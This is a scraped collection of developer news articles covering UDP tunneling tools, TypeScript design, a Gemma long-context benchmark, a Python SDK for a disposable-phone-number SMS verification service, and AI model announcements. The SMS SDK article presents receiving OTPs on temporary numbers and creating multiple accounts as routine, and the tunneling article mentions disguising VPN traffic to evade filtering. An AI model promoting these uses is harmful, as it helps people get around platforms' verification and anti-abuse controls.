# wpnews.pro — Full Content Corpus (en)

> 100 most-recent articles in markdown. Updated every 30 min.
> Source: https://wpnews.pro/llms-full.txt

---
## Beyond HTTP: Exposing WebRTC and Local Game Servers via UDP Tunnels

> Published: 2026-05-24 06:53:44+00:00
> Source: https://dev.to/instatunnel/beyond-http-exposing-webrtc-and-local-game-servers-via-udp-tunnels-5ak5
> wpnews: https://wpnews.pro/news/beyond-http-exposing-webrtc-and-local-game-servers-via-udp-tunnels

IT
InstaTunnel Team
Published by our engineering team
Beyond HTTP: Exposing WebRTC and Local Game Servers via UDP Tunnels
For the better part of the last decade, developers have relied on localhost tunneling services to expose local applications to the wider internet. Tools that generate a quick, temporary URL pointing straight to your machine’s port 3000 became indispensable for web developers building webhooks, OAuth flows, and REST APIs.
But the development ecosystem of 2026 has outgrown that model. We are no longer just building stateless HTTP web applications. We are building real-time multiplayer game netcode, low-latency video streaming applications using WebRTC, and specialized IoT networks running protocols like CoAP and DTLS. The problem is that most legacy tunneling tools are strictly hardcoded for HTTP and TCP. When you try to route a connectionless protocol like UDP through a TCP-centric tunnel, you encounter massive overhead, latency spikes, and fundamentally broken application behaviour.
This article explains why, walks through the tools that actually solve it, and covers what you need to know to do it safely.
The UDP Problem: Why Traditional Tunnels Fail
To understand why tunneling UDP is difficult, you have to look at the architectural difference between TCP and UDP.
TCP (Transmission Control Protocol) is connection-oriented. It guarantees delivery, manages packet ordering, and handles error checking. It is perfect for web traffic, where receiving every byte of an HTML document in the correct order is non-negotiable. Traditional tunneling tools thrive on TCP because they act as reverse proxies, managing the state of the connection between the public endpoint and your local machine.
UDP (User Datagram Protocol) is connectionless — a fire-and-forget protocol. It does not care if a packet arrives out of order, or at all. This absence of overhead is what makes UDP the backbone of real-time applications where low latency beats perfect reliability.
When you push a game server’s UDP traffic through a TCP tunnel, the tunneling software encapsulates lightweight, stateless UDP packets inside a heavy, stateful TCP connection. This produces head-of-line blocking: if a single packet is lost on the public network, TCP stalls the entire stream while waiting for retransmission. For a web page, that is a minor delay. For a fast-paced multiplayer game or a live WebRTC video call, it means rubber-banding, latency spikes, and dropped clients.
This architectural mismatch is exactly why ngrok — arguably the most widely installed tunneling tool in the world — still does not support UDP in 2026. Its free tier also carries a hard 1 GB/month bandwidth cap, and its recent pivot toward enterprise “Universal Gateway” features has made the free experience noticeably more restrictive.
The Bigger Picture: UDP Is Winning at the Protocol Level
This is not just a developer-tooling story. The broader internet is moving toward UDP at a fundamental level.
HTTP/3, the latest version of HTTP, runs over QUIC (RFC 9000) — a transport protocol built on UDP, not TCP. QUIC solves TCP’s head-of-line blocking problem at the transport layer: each stream handles packet loss independently, so a lost packet for one resource does not freeze the others. As of October 2025, HTTP/3 adoption had reached 35% of global traffic according to Cloudflare data, and over 95% of major web browsers support it. Real-world benchmarks show HTTP/3 response times roughly 47% faster than HTTP/1.1 on high-latency or lossy connections.
For streaming media, Media over QUIC (MOQ) is emerging as an alternative to WebRTC for broadcast-grade use cases, with sub-second latency over QUIC-based WebTransport. The first production MOQ deployment launched in 2025.
The takeaway for developers: UDP is no longer a niche concern for game programmers. It is the foundation of the modern, real-time web. Your tooling needs to reflect that.
The Modern UDP Tunneling Landscape (2026)
The tunneling market has bifurcated. A handful of tools handle HTTP well and UDP not at all (ngrok, Localtunnel). A newer generation treats UDP as a first-class citizen. Here is where things stand.
LocalXpose
LocalXpose has become the go-to recommendation in communities like r/selfhosted and gaming forums for raw protocol support. It treats HTTP, HTTPS, TCP, TLS, and UDP as equally valid tunnel types. Its dedicated UDP tunnels map a public port directly to your local instance without encapsulation overhead, and it provides both a CLI and a GUI — making it accessible to non-developers who want to run a game server for friends without learning terminal flags. Pricing is approximately $6/month for 10 concurrent tunnels with unlimited bandwidth, along with a built-in file server for sharing game mods or server logs.
Pinggy
Pinggy has gained traction in the terminal-first crowd with one compelling trick: it requires nothing to install. You run a standard SSH command and get a live tunnel — no npm package, no binary. It supports HTTP, HTTPS, TCP, UDP, and TLS tunnels, and adds a terminal UI with QR codes and a built-in request inspector. The Pro plan is $3/month, less than half the cost of ngrok’s Personal plan ($8/month), and unlike ngrok, UDP is fully supported. For quick “let me show you this” moments, it is hard to beat.
Localtonet
Localtonet has become a strong all-rounder, described as offering features that would otherwise require three separate tools: a webhook inspector, a file server, and a mobile proxy — all in one. It supports HTTP, TCP, and UDP with end-to-end encryption across 16+ global server locations. At approximately $2/tunnel/month with unlimited bandwidth and no session timeouts, it significantly undercuts ngrok on price.
Playit.gg
Playit.gg is purpose-built for gamers. It provides both TCP and UDP tunnels for hosting Minecraft, Terraria, and other multiplayer game servers, is open source, and offers a generous free tier with up to 4 TCP and 4 UDP tunnels. The paid plan (Playit Plus) costs $3/month or $30/year and adds custom domains, dedicated IPs, and additional tunnels. If your only use case is hosting a game server, this is the most frictionless starting point.
Self-Hosted: FRP and WireGuard
For teams with data sovereignty requirements, self-hosted options like FRP (Fast Reverse Proxy) give you full control over your infrastructure, no vendor lock-in, and support for complex protocol configurations. WireGuard, often paired with Tailscale for zero-configuration NAT traversal, provides proven speed advantages with minimal latency — particularly well-suited for streaming, video, and high-frequency update workloads. Wrapping WireGuard in QUIC (as Mullvad and others now support) makes the traffic indistinguishable from ordinary HTTP/3 web traffic, which is rarely filtered even on restrictive networks.
Use Case 1: Local Game Servers
Game servers rely heavily on UDP for player position updates, fast-sync actions, and state replication. If your ISP uses Carrier-Grade NAT (CGNAT) — meaning you do not actually have a public IP address to port forward from your router — you traditionally had to rent a cloud VPS just to test your netcode.
With LocalXpose, exposing a local game server is a single command. If your server is listening on port 19132:
loclx tunnel udp --to 127.0.0.1:19132 --region us
The CLI outputs a public endpoint such as us-1.loclx.io:4506. Your friends or playtesters enter that address into their game client. Traffic flows cleanly through the public UDP endpoint to your machine, preserving the low latency required for real-time play. With Pinggy, the equivalent command using SSH is:
ssh -p 443 -R0:localhost:19132 udp@a.pinggy.io
No binary to install, no account required to try it.
Use Case 2: WebRTC Testing and Video Apps
WebRTC is the standard for browser-based, peer-to-peer real-time communication. While its initial signalling phase (exchanging connection details via SDP) happens over HTTP or WebSockets, the actual media streams are transmitted over UDP using SRTP (Secure Real-time Transport Protocol).
Testing WebRTC locally is notoriously frustrating. WebRTC uses the ICE (Interactive Connectivity Establishment) framework to find the shortest path between peers. Corporate firewalls and NAT regularly block the incoming UDP media streams — resulting in a successful signalling handshake where neither side can hear or see the other. TURN and STUN servers help with NAT traversal, but they do not solve the problem of your local SFU or media server not being reachable at all.
The practical fix is to tunnel both layers simultaneously. Using a service like Localtonet, which supports mixed TCP/UDP workloads, you can expose your signalling server (TCP/HTTP) and your media ports (UDP) at the same time. This allows external peers or mobile devices to connect to your local WebRTC instance and stream video directly through the firewall, mimicking a production environment without deploying to a staging server.
For teams using mediasoup, Janus, or a custom SFU locally, this removes a significant CI friction point.
Use Case 3: IoT and Embedded Systems
The IoT ecosystem favours lightweight protocols to conserve battery life and bandwidth on constrained devices. CoAP (Constrained Application Protocol) and MQTT over DTLS (Datagram TLS) both rely entirely on UDP.
If you are developing firmware for a custom sensor board and need to test its telemetry reporting to an external cloud ingestion service, you need a public UDP endpoint that you can hand off to a remote team or a CI pipeline. Tunnels like LocalXpose or Pinggy let you expose your local IoT rig to the internet, allowing cloud-based services to push commands directly to a device on your desk — no staging environment required.
Security: What You Are Actually Exposing
UDP tunnels are powerful, but they fundamentally extend your localhost’s trust boundary to the open internet. Do not treat them as casually as an HTTP tunnel.
DDoS vulnerability. Unlike HTTP tunnels that can rate-limit requests based on headers and session state, raw UDP tunnels forward datagrams indiscriminately. An attacker who discovers your public UDP endpoint can flood it with garbage packets, easily saturating your local connection. Always close UDP tunnels the moment your testing session ends — ephemeral is not just convenient, it is a security property.
No inherent authentication layer. HTTP tunnels can overlay Basic Auth or OAuth. Raw UDP does not have that concept. The application listening on the exposed port must handle its own authentication. If you are exposing a game server or local database, ensure it requires strong credentials independently of the tunnel.
The OAuth redirect URI trap. A real risk that has become more visible in 2026: developers who register an ephemeral tunnel URL as an authorised redirect URI in a Google or GitHub OAuth app and forget to remove it after the PR merges. If that subdomain pattern is later issued to another user on the same tunneling service, they can potentially intercept OAuth callbacks. Mitigate this by implementing automated cleanup of OAuth redirect URIs as part of your PR merge workflow, and enforce OIDC authentication at the tunnel edge for any OAuth-adjacent testing.
Identity-aware access for sensitive workloads. For anything beyond throwaway local testing, tools like Cloudflare Tunnel or Tailscale enforce authentication before traffic can reach your tunnel endpoint. This should be the baseline for any tunnel that stays up longer than a single session.
Tool Comparison at a Glance
Feature ngrok Pinggy LocalXpose Localtonet Playit.gg
UDP Support ✗ ✓ ✓ ✓ ✓
Free Tier 1 GB/mo Yes Yes 1 tunnel, 1 GB 4 UDP + 4 TCP
Paid Plan $8/mo $3/mo ~$6/mo ~$2/tunnel/mo $3/mo
Install Required Yes No (SSH) CLI/GUI CLI/GUI/SSH Yes
Best For HTTP/Webhooks Quick sharing Gaming, IoT All-round workloads Game servers
What Is Next: WebTransport and the Blurring Line
The line between “UDP tunneling” and “HTTP” is going to

---
## Stop Using TypeScript as a Type Checker — Start Using It as a Design System

> Published: 2026-05-24 06:52:16+00:00
> Source: https://dev.to/dev_ahmed1/stop-using-typescript-as-a-type-checker-start-using-it-as-a-design-system-8o0
> wpnews: https://wpnews.pro/news/stop-using-typescript-as-a-type-checker-start-using-it-as-a-design-system

TypeScript is often misunderstood as merely "JavaScript with types," but this definition captures only about 30% of its value. Its true power lies not in preventing runtime errors, but in enforcing system design discipline at compile time by making invalid states unrepresentable through constructs like discriminated unions and strict type contracts. When used as a design system rather than just a type checker, TypeScript transforms code evolution from guesswork to verified, mechanical change, eliminating entire categories of bugs caused by unclear data shapes, implicit assumptions, and inconsistent API responses.

TypeScript is often introduced as:

“JavaScript with types”

That definition is technically correct — and practically misleading.

Because if this is how you use TypeScript, you are only using ~30% of its value.

The real power of TypeScript is not in preventing runtime errors.

It is in forcing system design discipline at compile time.

This article focuses on how TypeScript changes architecture decisions, not syntax.

- The Hidden Problem in JavaScript: Undefined Contracts

In JavaScript systems, most bugs don’t come from syntax mistakes.

They come from:

unclear data shapes

implicit assumptions between modules

silent undefined values

inconsistent API responses

Example:

```
getUser().name.toUpperCase()
```

This assumes:

user exists

name exists

name is a string

Nothing enforces this.

- TypeScript’s Real Job: Making Assumptions Explicit

Now rewrite the same idea:

```
type User = {
  name: string;
};

function getUser(): User | null
```

Now the system forces you to handle reality:

``` js
const user = getUser();

if (!user) return;

console.log(user.name.toUpperCase());
```

The key difference is not safety.

The key difference is:

you are no longer allowed to ignore system uncertainty.

- Union Types Are a State Machine in Disguise

Most developers treat union types as a convenience:

```
type Status = "idle" | "loading" | "success" | "error";
```

But this is actually a state machine definition.

Now your UI logic becomes constrained:

```
if (status === "loading") {}
if (status === "error") {}
```

You are no longer writing “if checks”.

You are modeling system behavior.

- The “Impossible State” Problem and Why TypeScript Solves It

In JavaScript, you can easily reach invalid states:

loading = true + error exists

user = null + role = "admin"

data = undefined but UI rendered

TypeScript eliminates this class of bugs using discriminated unions:

```
type State =
  | { status: "loading" }
  | { status: "success"; data: string }
  | { status: "error"; message: string };
```

Now invalid states are unrepresentable.

This is not a feature.

This is architecture enforcement.

- Type Inference Is a Compiler-Driven Design Assistant

A common misconception:

“TypeScript slows development down”

In reality, inference reduces mental overhead.

Example:

``` js
const users = [
  { id: 1, role: "admin" },
  { id: 2, role: "user" }
];
```

TypeScript automatically derives:

```
{
  id: number;
  role: string;
}[]
```

Now you get:

autocomplete

refactoring safety

consistency across the codebase

Without manually maintaining types everywhere.

- Type Narrowing = Controlled Execution Flow

Instead of runtime guessing:

```
if (typeof value === "string") {
  value.toUpperCase();
}
```

TypeScript makes execution flow explicit.

But the deeper idea is:

Type narrowing is not about types — it is about controlling program paths.

Every if becomes a validated transition of state.

- API Design Becomes a Compile-Time Contract

Compare:

JavaScript API:

```
createUser(data)
TypeScript API:
function createUser(data: {
  email: string;
  password: string;
}): Promise<{ id: string }>
```

Now the function is not just implementation.

It is a public contract enforced by the compiler.

This eliminates:

invalid payloads

undocumented requirements

runtime validation leaks

- Why Large Systems Break Without Type Systems

In large codebases, JavaScript fails in one core way:

Change becomes dangerous.

Because nothing tells you what breaks.

TypeScript flips this:

Change becomes mechanical.

You modify a type → compiler shows impact instantly.

This changes system evolution from:

guessing → verification

runtime debugging → compile-time correction

Conclusion

TypeScript is not a productivity tool.

It is a system constraint engine.

If you use it only for:

avoiding any

adding types to functions

basic autocomplete

You are underusing it.

The real value is this:

TypeScript lets you design systems where invalid states cannot compile.

That is the real upgrade from JavaScript — not syntax, but discipline.

---
## How Google I/O 2026 Inspired Me to Start Building a Telugu Jarvis AI

> Published: 2026-05-24 06:49:33+00:00
> Source: https://dev.to/bajiniteenoj/how-google-io-2026-inspired-me-to-start-building-a-telugu-jarvis-ai-249f
> wpnews: https://wpnews.pro/news/how-google-i-o-2026-inspired-me-to-start-building-a-telugu-jarvis-ai

The author describes being inspired by Google I/O 2026 to create a Telugu-language AI assistant, similar to "Jarvis." They argue that AI should be accessible in regional languages like Telugu to help millions of Indian students learn and communicate more effectively. The project aims to build Telugu-first AI experiences to make technology more inclusive and confidence-building for non-English speakers.

Note: I used AI tools to help improve writing structure and organize my ideas, while the project concept, opinions, and personal perspective are my own.
Why Regional Language AI Matters
One thing I strongly believe is that AI should not only work well for English speakers.
In countries like India, millions of students are more comfortable learning and communicating in regional languages like Telugu. If AI tools become more multilingual and accessible, they can help students learn faster and feel more confident using technology.
That is one of the main reasons I want to continue building Telugu-first AI experiences.

---
## I stress-tested Gemma 4 E4B's 128K context on a laptop GPU — recall is great, prefill is not

> Published: 2026-05-24 06:44:15+00:00
> Source: https://dev.to/yashksaini/i-stress-tested-gemma-4-e4bs-128k-context-on-a-laptop-gpu-recall-is-great-prefill-is-not-244i
> wpnews: https://wpnews.pro/news/i-stress-tested-gemma-4-e4b-s-128k-context-on-a-laptop-gpu-recall-is-great-is

Here is a factual summary of the article:

The article details a stress test of the Gemma 4 E4B model's 128K context window on a laptop GPU (RTX 5050). The test found that while the model's recall of information within the context remained perfect across all tested sizes, the "time to first token" (prefill latency) increased dramatically and almost linearly with context length, rising from 4 seconds at 5K tokens to 72 seconds at 100K tokens. The author concludes that the 128K specification is accurate but misleading, as it does not account for the significant prefill latency that makes the model impractical for interactive use on consumer hardware.

Thursday night I let a benchmark run while I slept. By Friday morning Gemma 4 E4B had answered fifteen needle-in-a-haystack questions across four context sizes on my RTX 5050 laptop. The recall numbers were better than I expected. The latency numbers were worse. Here's both, with the ~30 lines of Python to reproduce it on your own hardware.

I keep seeing "Gemma 4 E4B has a 128K context window" repeated as if it were a single property, like *"the engine is 3.5 litres"*. It is not a single property. A context-window number means at least three different things — *will the model accept this many tokens?*, *will it remember what's in the middle of them?*, and *how fast does the first answer token arrive?* — and the answers diverge sharply once you leave the laptop-GPU regime that most spec sheets assume.

This is the post I wish I'd had when I started building on E4B. The TL;DR is in the table further down. The reproducible test rig is at the bottom.

## The setup

-
**Hardware:** RTX 5050 Laptop, 8 GB VRAM, 24 GB system RAM, Intel i7-13620H -
**Software:** Ollama 0.24.0,`gemma4:e4b`

(Q4_K_M, ~9.6 GB on disk), Linux 7.x -
**Test:** needle-in-a-haystack — five unique 4-character codes embedded at fixed positions inside a long synthetic English document; the model has to recover each one in isolation by exact match.

The test is deliberately simple. I want to know whether the model can *find* a fact at a known position, not whether it can paraphrase it. Reasoning quality is a different benchmark and needs human evaluation, which I didn't have budget for.

I ran the sweep at 5K, 20K, 60K, and 100K target context sizes. I didn't push to the 128K spec because Ollama's `num_ctx`

setting interacts with the K/V cache headroom in ways I didn't have time to characterize cleanly, and 100K is already 80% of the spec.

## The numbers

| Context | Pass rate (5/5) | Tokens/sec | Time to first token |
|---|---|---|---|
| 5K | 5/5 ✓ | 9.2 | 4 s |
| 20K | 5/5 ✓ | 8.6 | 15 s |
| 60K | 5/5 ✓ | 7.6 | 38 s |
| 100K | 5/5 ✓ | 6.8 | 72 s |

Three things stand out.

**Recall stayed perfect.** I expected E4B to wobble somewhere past 60K — that's the failure mode I see most reported for 4B-class models, the "middle of the context is fuzzy" problem. The needles at 25% and 75% are exactly where I'd expect drop-off. They held. I re-ran the sweep twice to be sure.

**Generation throughput barely moved.** 9.2 tok/s at 5K vs. 6.8 tok/s at 100K. That's a 26% drop across a 20x context increase. The K/V cache is the obvious culprit, but in practical terms: once the answer starts streaming, it streams at roughly the same speed.

**Time to first token blew up.** 4s at 5K, 72s at 100K. Almost linear in context size. This is the prefill phase — the model encoding everything you sent it before producing the first output token. On a laptop GPU, prefill is where the consumer-hardware tax lives.

## What this means if you're building on E4B

Let me write the practical zones the way I actually think about them, not the marketing version:

-
**Under 20K tokens:*** interactive.*First token in ~15 seconds, full answer in ~25-30s. This feels like a real conversation. Most single-paper Q&A lives here. -
**20K to 60K tokens:*** research-assistant.*30-40 second TTFT. You're going to glance away from the screen. That's fine, the answer will be there when you look back. Multi-paper comparisons, longer contexts. -
**60K to 100K tokens:*** batch.*You're queuing a job. 60-80 second TTFT means you might as well make coffee. Loading a whole codebase, a textbook chapter, a quarter's worth of meeting notes. -
**Above 100K:** I didn't measure. The prefill cost was already breaching my "is this still interactive?" threshold and the use case I was solving for didn't need it.

If you're designing a UI on top of this model, *surface these zones to the user*. A progress bar or a tier label ("interactive / research / batch") tells someone what their next click will *feel* like before they ask. The 128K spec is honest; it just doesn't tell you when it'll start.

## Reproduce it yourself

The whole rig is about 30 lines once you strip the CLI scaffolding. Save this as `bench.py`

, install `ollama`

(`pip install ollama`

), then run it:

``` python
import random, time
import ollama

MODEL = "gemma4:e4b"
NEEDLE_POSITIONS = [0.05, 0.25, 0.50, 0.75, 0.95]

def make_needles(k=5, seed=20260521):
    rng = random.Random(seed)
    chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    return [(f"box-{i+1}", "".join(rng.choices(chars, k=4))) for i in range(k)]

def build_haystack(target_tokens: int, needles):
    # Filler ~ 80 tokens per sentence, English-ish prose.
    filler = (
        "The committee continued its review of the operational notes "
        "submitted during the prior fiscal quarter, with particular "
        "attention paid to procedural anomalies. "
    )
    sentences_needed = target_tokens // 20  # ~4 tok/word, 5 words/sentence avg
    body = (filler * sentences_needed)[: target_tokens * 4]
    # Splice needles in at fixed positions
    out = body
    for pos, (label, code) in zip(NEEDLE_POSITIONS, needles):
        i = int(pos * len(out))
        out = out[:i] + f"\n\nNote: {label} contains the code {code}.\n\n" + out[i:]
    return out

def ask(haystack: str, label: str, num_ctx: int) -> tuple[str, float, float]:
    t0 = time.time()
    first_t = None
    chunks = []
    for r in ollama.chat(
        model=MODEL,
        messages=[
            {"role": "system", "content": "Answer with only the 4-character code, nothing else."},
            {"role": "user", "content": haystack + f"\n\nWhat code is in {label}?"},
        ],
        stream=True,
        options={"num_ctx": num_ctx},
    ):
        delta = r.get("message", {}).get("content", "")
        if delta:
            first_t = first_t or time.time()
            chunks.append(delta)
    answer = "".join(chunks).strip()
    return answer, (first_t - t0) if first_t else 0, time.time() - t0

if __name__ == "__main__":
    needles = make_needles()
    for ctx in (5_000, 20_000, 60_000, 100_000):
        hay = build_haystack(ctx, needles)
        passed = 0
        for label, code in needles:
            ans, ttft, total = ask(hay, label, num_ctx=ctx + 4_000)
            passed += code in ans
            print(f"  ctx={ctx:>6,}  {label}  expected={code}  got={ans!r}  ttft={ttft:.1f}s  total={total:.1f}s")
        print(f"ctx={ctx:>6,}  pass={passed}/{len(needles)}")
```

It writes to stdout. If you want JSON-lines results to plot, redirect to a file and parse the `ctx=… pass=…`

lines. The whole sweep takes ~30 minutes on an RTX 5050; longer on smaller GPUs.

The seed is fixed (`20260521`

) so the needle strings are deterministic. If your pass rate doesn't match mine at the same `(model, ctx, seed)`

, that's a real signal — likely Ollama version, quantization, or hardware-driver path.

## Things this rig deliberately doesn't measure

**Quality of paraphrase.** The needles are literal 4-character codes. I'm measuring *can the model find it?*, not *can the model reason about it?*. Those are different benchmarks.

**VRAM consumption.** Ollama owns the K/V cache and I'm not going to fight it for memory accounting. `nvidia-smi`

says it sits around 7.4 GB at 100K context, but I haven't characterized the curve.

**Cross-document attention.** Each needle is asked in isolation. Multi-fact composition ("how does the figure on page 12 of paper A relate to section 3 of paper B?") is a different problem. I don't have a clean benchmark for it. I'm working on it.

## The honest comparison

Qwen 3.5 27B has ~190K effective context on similar hardware. Llama 3.1 70B (if you can fit it) goes further. On *raw context size alone*, Gemma 4 E4B isn't the winner.

What E4B *is* the winner at is the **combination**: 128K context + native vision + native audio + ~9.6 GB on disk, all in one model. That combination is what makes whole-document workloads tractable on a laptop. Qwen 27B doesn't fit in 8 GB of VRAM. Llama 3.1 70B doesn't either. If your hardware constraint is "consumer GPU", E4B is the only model in this class with 128K context *and* multimodality.

That's the framing I'd give someone choosing an open-weights model for a single-machine deployment in 2026.

## Three places I'd take this benchmark next

-
**Mixed-modality recall.** Embed half the needles in text, half in rendered images. See if vision-encoded needles degrade differently from text-encoded ones. (This is the part most relevant to anyone building doc-Q&A.) -
**Cross-document needles.** Two documents in context, the needle in paper A, the question phrased to require paper B's vocabulary. The actual "I have a library, I want to ask questions" workload. -
**Long-document Q&A with human evaluation.** Pay five grad students to grade 100 questions about a single 25-page research paper. Real quality numbers, not synthetic ones.

If you run any of these, I'd genuinely like to read the results.

**Connect with me:**

• [Website](https://yashksaini.vercel.app/)

• [GitHub](https://github.com/yashksaini-coder)

• [LinkedIn](https://www.linkedin.com/in/yashksaini/)

• [X (Twitter)](https://x.com/0xcrackedDev)

---
## Python SDK for Tell A Bot API: Automate Your SMS Verification

> Published: 2026-05-24 06:38:41+00:00
> Source: https://dev.to/tellabot_sms/python-sdk-for-tell-a-bot-api-automate-your-sms-verification-2c3f
> wpnews: https://wpnews.pro/news/python-sdk-for-tell-a-bot-api-automate-your-sms-verification

The article announces the release of a Python SDK for the Tell A Bot API, which provides temporary US phone numbers to receive SMS messages and OTP codes for over 700 services. The SDK allows developers to automate phone verification in bots, scrapers, and testing pipelines by requesting numbers, waiting for SMS, and extracting PIN codes via API calls or webhooks. Key features include balance checking, number rejection, error handling, and service listing with pricing and availability.

If you've ever built a bot, scraper, or testing pipeline that needs to verify a phone number, you know the pain: SIM cards, forwarding services, juggling multiple numbers manually. [Tell A Bot](https://www.tellabot.com) solves this — it gives you temporary US phone numbers on demand, receives the SMS, and hands you back the OTP code. All via API.

We just published a **Python SDK** on GitHub, so I wanted to walk through what it looks like in practice.

## What is Tell A Bot?

[Tell A Bot](https://www.tellabot.com) is a service for receiving SMS online using temporary US phone numbers. You request a number for one of 700+ supported services, the number waits for an incoming SMS, and once it arrives you read the message and the extracted PIN code through the API.

Common use cases:

- Automating account registration or verification flows in tests
- Receiving OTP codes in scripts without a physical SIM
- Spinning up multiple accounts for a service during development

## Installation

```
pip install get-sms-online
```

Or directly from GitHub:

```
pip install git+https://github.com/getsms-online/get.sms.online-python.git
```

Generate your API key at **Account → Profile** in Tell A Bot's members area.

## The simplest case — request a number and wait for the code

``` python
from getsms import GetSMSClient, GetSMSError

client = GetSMSClient(user="your_username", api_key="your_api_key")

# Check your balance first
print(f"Balance: ${client.balance()}")

# Request a number for WhatsApp and wait for the SMS
requests = client.request_number("WhatsApp")
req = requests[0]
print(f"Your number: +{req['mdn']}")

sms = client.wait_for_sms(req["id"], timeout=900)
if sms:
    print(f"SMS: {sms['reply']}")
    print(f"Code: {sms['pin']}")
else:
    print("No SMS received in time")
```

`wait_for_sms`

polls the API every 15 seconds (the recommended minimum) and returns the message once an SMS arrives, or `None`

on timeout.

## Error handling

``` python
from getsms import GetSMSClient, GetSMSError

client = GetSMSClient(user="your_username", api_key="your_api_key")

try:
    requests = client.request_number("Google")
    req = requests[0]

    sms = client.wait_for_sms(req["id"])
    if sms:
        print(f"Got code: {sms['pin']}")
    else:
        print("Timed out — no SMS received")

except GetSMSError as e:
    # API-level errors: invalid service name, no numbers available, etc.
    print(f"API error: {e}")
except Exception as e:
    # Network errors
    print(f"Request failed: {e}")
```

## Reject a number you don't want

If the assigned number looks wrong or you want to skip it, reject it — it won't be offered to you again:

```
requests = client.request_number("Telegram")
req = requests[0]

if req["mdn"].startswith("1212"):
    client.reject(req["id"])   # NYC numbers blocked by the service? Skip it.
```

## Webhooks instead of polling

If you're handling volume, configure a webhook URL at **Account → Profile**. Tell A Bot will POST to your endpoint the moment an SMS arrives, with fields including `event`

, `id`

, `reply`

, `pin`

, and `price`

. No polling loop needed.

## Check available services and pricing

```
# All services
services = client.list_services()
for s in services:
    print(f"{s['name']}: ${s['price']} ({s['otp_available']} available)")

# Single service — also returns recommended_markup for priority bidding
info = client.list_services("Google")
print(info[0]["recommended_markup"])
```

## Links

-
[Tell A Bot](https://www.tellabot.com)— sign up, manage numbers, configure webhooks -
[API reference](https://www.tellabot.com/api_command_reference.php)— full documentation -
[Python SDK on GitHub](https://github.com/getsms-online/get.sms.online-python)— source

---
## What I Understood from Cracking the Coding Interview

> Published: 2026-05-24 06:37:03+00:00
> Source: https://dev.to/vishwa_k/what-i-understood-from-cracking-the-coding-interview-okc
> wpnews: https://wpnews.pro/news/what-i-understood-from-cracking-the-coding-interview

The article summarizes key lessons from the book *Cracking the Coding Interview*, emphasizing that technical interviews test problem-solving ability and practical coding skills rather than academic knowledge or memory. It highlights the importance of regular practice with real interview questions, clear communication of one's thought process during interviews, and the need for confidence and analytical thinking. The author concludes that success in software interviews requires more than intelligence or good grades, demanding dedicated preparation and a focus on practical learning.

Recently, my mentor gave me the book Cracking the Coding Interview and asked me to read it carefully. After reading the introduction, I understood many important things about technical interviews, coding skills, and the real expectations of software companies. The book gave me a new perspective on how students should prepare for interviews and careers in the software industry.
The introduction begins with a story about a candidate who was highly talented but still failed a technical interview. He had a strong academic background, a very good GPA, and experience working on open-source projects. He was intelligent, creative, and hardworking. Even with all these qualities, he was rejected because he could not perform well during the interview process. This story made me realize that academic marks and theoretical knowledge alone are not enough to succeed in technical interviews.
One of the main lessons I learned from this book is that coding interviews are designed to test problem-solving ability rather than memory. Interviewers are not interested only in whether a candidate knows programming languages or textbook definitions. They want to see how candidates think, how they approach a problem, and how effectively they can develop a solution. The candidate in the story struggled because he could not quickly identify efficient algorithms and made coding mistakes during the interview. This showed me that interviews require strong analytical thinking and practical coding skills.
Another important point explained in the book is the value of practice. Many students spend a lot of time studying theory from textbooks and learning complex concepts. While these topics are useful, they are not sufficient for interview preparation. The author explains that candidates should practice real interview questions regularly. By solving different coding problems, students can learn common patterns, improve logical thinking, and gain confidence. This helped me understand that daily practice is one of the most important parts of preparation.
The book also highlights the importance of communication during interviews. Candidates should not only write code but also explain their thinking process clearly. Interviewers observe how candidates analyze the problem, discuss multiple approaches, and improve their solutions step by step. Even when mistakes happen, the ability to correct them calmly is important. This taught me that confidence and communication skills are equally valuable in technical interviews.
I was also inspired by the author’s passion for teaching. She explains that many talented students fail interviews not because they are weak, but because they prepare in the wrong way. Her goal is to help students understand the interview process and improve their preparation methods. This motivated me to focus more on practical learning instead of only studying theory.
Overall, Cracking the Coding Interview helped me understand that success in software interviews requires more than intelligence or academic performance. It requires problem-solving ability, coding practice, logical thinking, and confidence. The introduction itself gave me valuable guidance about how to prepare for my future career. After reading it, I feel more motivated to improve my coding skills, practice interview questions regularly, and become a better software engineer in the future.

---
## How Thinking Machines built interactivity into the model

> Published: 2026-05-24 06:35:52+00:00
> Source: https://dev.to/thousand_miles_ai/how-thinking-machines-built-interactivity-into-the-model-3an8
> wpnews: https://wpnews.pro/news/how-thinking-machines-built-interactivity-into-the-model

According to a May 11, 2026 research preview from Thinking Machines, the company has developed a new class of "interaction models" that process audio, video, and text in continuous 200-millisecond ticks, eliminating the need for a separate voice-activity-detection component. This design allows the model to handle input and output streams concurrently, achieving 0.40 seconds end-to-end latency on the FD-bench V1 benchmark—roughly three times faster than GPT-realtime-2.0 and half the latency of Gemini-3.1-flash-live. The system splits responsibilities between a 276-billion-parameter interaction model for real-time conversation and an asynchronous background model for deeper reasoning, enabling the interaction model to maintain continuous dialogue without freezing during complex tasks.

A new release from Thinking Machines, dated May 11, 2026, lands at 0.40 seconds end-to-end on the FD-bench V1 turn-taking benchmark — about three times faster than GPT-realtime-2.0 (xhigh) and roughly half the latency of Gemini-3.1-flash-live (high). The latency number is the surface story. The architectural story is what makes it possible: the model is processing audio, video, and text in 200-millisecond ticks, with no separate turn-detection component sitting between the user and the weights.
The post that landed at thinkingmachines.ai is a research-preview announcement of a class of models the team is calling interaction models. The framing question worth taking seriously is this: what changes when interactivity is part of the model itself instead of a harness around it? The three sections below walk through the answer.
A turn-based model receives one complete input, generates one complete output, and waits. An interaction model receives 200ms of input and produces 200ms of output, then 200ms more, then more — input and output streams running concurrently. The model does not see "the user's turn finished, now respond." It sees a continuous interleaved sequence: input chunk, output chunk, input chunk, output chunk, with no artificial turn boundaries to honor.
What disappears in this design is the voice-activity-detection harness that lives between the user and the model in most real-time speech systems today. Turn-based models cannot tell on their own whether the user is thinking, yielding the floor, or being briefly silent — a separate, smaller component makes that call and passes the model a "go" signal. Thinking Machines argues, citing The Bitter Lesson, that any harness less intelligent than the model itself will eventually be outpaced by the model. So they remove the harness, and the things that harnesses could not express — speaking while listening, reacting to a visual cue without an audio prompt — become things the model can do directly.
The audio and video paths are deliberately lightweight. Audio comes in as dMel features through a thin embedding layer, not a Whisper-style encoder. Images are split into 40×40 patches encoded by an hMLP. The audio decoder is a flow head. All four components — embedding, image patcher, flow head, and the main transformer — are co-trained from scratch together. The phrase the team uses is encoder-free early fusion, and the practical effect is that there is no separate pre-processing model whose limits cap what the interaction model can do.
